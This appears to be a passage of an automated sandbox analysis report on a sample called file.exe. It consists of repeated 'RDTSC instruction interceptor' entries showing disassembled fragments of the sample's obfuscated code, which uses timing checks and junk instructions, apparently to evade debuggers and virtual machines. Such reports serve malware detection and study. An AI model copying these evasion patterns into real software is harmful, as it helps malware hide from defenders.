                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428B1 second address: C428B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4276C second address: C42770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428B5 second address: C428B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428B9 second address: C428BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428BF second address: C428C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428C6 second address: C42925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, 7DDAE682h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC41CDAB668h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a or si, 392Bh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC41CDAB668h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D3192h], edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push edx 0x00000058 pop edx 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42925 second address: C4292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43094 second address: C4309A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C443A6 second address: C44425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FC41CC2F0D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov esi, dword ptr [ebp+122D38CEh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FC41CC2F0C8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D31AEh], ebx 0x0000003a xchg eax, ebx 0x0000003b js 00007FC41CC2F0DFh 0x00000041 jmp 00007FC41CC2F0D9h 0x00000046 push eax 0x00000047 push esi 0x00000048 jl 00007FC41CC2F0CCh 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4587C second address: C4591B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FC41CDAB674h 0x00000010 pop esi 0x00000011 nop 0x00000012 and esi, dword ptr [ebp+122D3816h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FC41CDAB668h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+1244885Ah] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FC41CDAB668h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, 6197DE59h 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC41CDAB66Fh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4591B second address: C45926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46330 second address: C46391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b or cx, 2ECAh 0x00000010 mov dx, FD95h 0x00000014 popad 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FC41CDAB668h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007FC41CDAB66Fh 0x00000039 push eax 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46C45 second address: C46C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FC41CC2F0E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC41CC2F0C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E127 second address: C4E142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41CDAB674h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A4BD second address: C4A4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A4C2 second address: C4A4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50121 second address: C501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FC41CC2F0C6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FC41CC2F0CCh 0x00000014 pop edx 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+1244885Ah] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FC41CC2F0C8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 movzx edi, bx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007FC41CC2F0C8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 or bh, FFFFFF9Ch 0x0000005a xchg eax, esi 0x0000005b jmp 00007FC41CC2F0CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push edx 0x00000065 pop edx 0x00000066 jmp 00007FC41CC2F0D4h 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C501B5 second address: C501BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53275 second address: C53294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jng 00007FC41CC2F0C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C502BC second address: C502C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C512BF second address: C512C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C502C6 second address: C502D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C512C5 second address: C512C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C502D7 second address: C502E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53813 second address: C53818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C502E0 second address: C5036A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sbb edi, 54E52DB2h 0x00000012 push esi 0x00000013 mov ebx, edx 0x00000015 pop ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FC41CDAB668h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov bl, E5h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 movzx edi, dx 0x00000043 sub dword ptr [ebp+122D3390h], eax 0x00000049 mov eax, dword ptr [ebp+122D01CDh] 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007FC41CDAB668h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 mov edi, 72C017A6h 0x0000006e mov edi, dword ptr [ebp+122D36BEh] 0x00000074 push FFFFFFFFh 0x00000076 or bx, 7605h 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jo 00007FC41CDAB66Ch 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53818 second address: C5381D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5036A second address: C5036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5381D second address: C53891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3089h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC41CC2F0C8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D19E3h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FC41CC2F0C8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e jbe 00007FC41CC2F0CCh 0x00000054 sub dword ptr [ebp+1246B4B3h], edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jmp 00007FC41CC2F0CCh 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C547CC second address: C547D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C547D2 second address: C547E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56867 second address: C5686B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5686B second address: C56884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC41CC2F0CFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56884 second address: C56903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+12447BEAh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FC41CDAB668h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov di, FE00h 0x0000004b jmp 00007FC41CDAB674h 0x00000050 push 00000000h 0x00000052 mov edi, 5BAD9778h 0x00000057 mov edi, dword ptr [ebp+122D1B46h] 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56903 second address: C5690A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C539DD second address: C539E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55AC4 second address: C55ACE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A3A second address: C59A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D3417h], ecx 0x00000012 push 00000000h 0x00000014 add ebx, 54ED3621h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC41CDAB668h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57A0A second address: C57A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57ADA second address: C57AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58B93 second address: C58BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC41CC2F0D4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58BB2 second address: C58BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5AC05 second address: C5AC4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 033635CCh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 jg 00007FC41CC2F0DAh 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FC41CC2F0CFh 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59CAF second address: C59CB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59CB5 second address: C59CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E714 second address: C5E728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E728 second address: C5E72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6412B second address: C6414A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC41CDAB673h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6414A second address: C64152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638AA second address: C638BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC41CDAB666h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63A28 second address: C63A2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63A2E second address: C63A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC41CDAB666h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC41CDAB679h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63A57 second address: C63A88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CC2F0D2h 0x00000008 jp 00007FC41CC2F0C6h 0x0000000e jbe 00007FC41CC2F0C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC41CC2F0D5h 0x0000001b jno 00007FC41CC2F0C6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63D1D second address: C63D3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C677DD second address: C677FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41CC2F0D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C677FF second address: C67829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB66Ch 0x00000009 jmp 00007FC41CDAB678h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0470A second address: C0470E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07D50 second address: C07D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07D56 second address: C07D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C709A3 second address: C709AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDC63 second address: BFDC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74183 second address: C741B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jbe 00007FC41CDAB671h 0x0000000d pop esi 0x0000000e push esi 0x0000000f jns 00007FC41CDAB679h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C748DA second address: C748E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C748E0 second address: C748E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C748E6 second address: C748EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74A6E second address: C74A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41CDAB679h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D63 second address: C74D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FC41CC2F0E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0D1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74ECD second address: C74ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74ED3 second address: C74EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41CC2F0C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0CCh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74EED second address: C74EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74EF2 second address: C74F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0CCh 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75060 second address: C75068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75068 second address: C7506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
